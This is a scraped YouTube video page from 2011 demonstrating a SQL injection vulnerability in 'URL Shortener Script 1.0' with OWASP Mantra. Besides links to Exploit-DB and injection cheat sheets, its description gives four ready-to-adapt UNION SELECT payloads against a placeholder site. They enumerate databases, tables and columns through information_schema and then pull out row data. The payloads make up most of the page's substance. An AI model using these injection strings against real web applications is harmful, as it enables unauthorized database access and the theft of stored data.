Loading...

OWASP Mantra - URL Shortener Script SQL Injection Vulnerability

7,760 views

Loading...

Loading...

Loading...

Rating is available when the video has been rented.
This feature is not available right now. Please try again later.
Published on Oct 25, 2011

OWASP Mantra
http://www.getmantra.com/

URL Shortener Script 1.0 SQL Injection Vulnerability
http://www.exploit-db.com/exploits/17...

SQL Injection cheat sheets -
http://ferruh.mavituna.com/sql-inject...
http://ha.ckers.org/sqlinjection/

How to : Create a simple url shortener script is a few minutes
http://djpate.com/2009/08/09/how-to-c...

Exploit-DB URL: http://www.exploit-db.com/exploits/17...

Getting Databases: http://www.service.com/shortURL/show.... union all select (select+concat(unhex(Hex(cast(schema_name+as+char)))) from information_schema.schemata limit LIMIT1,LIMIT2)--

Getting tables: http://www.service.com/shortURL/show.... union all select (select concat(unhex(Hex(cast(group_concat(table_name) as char)))) from information_schema.tables where table_schema=TABLE_INDIRECT)--

Getting columns: http://www.service.com/shortURL/show.... union all select (select concat(unhex(Hex(cast(group_concat(column_name) as char)))) from information_schema.columns where table_schema=DATABASE_NAME and table_name=TABLE_NAME)--

Getting Data: http://www.service.com/shortURL/show.... union all select (select concat(TABLE.COLUMN) from DATABASE.TABLE Order by COLUMN limit 0,1) --

Loading...

When autoplay is enabled, a suggested video will automatically play next.

Up next


to add this to Watch Later

Add to

Loading playlists...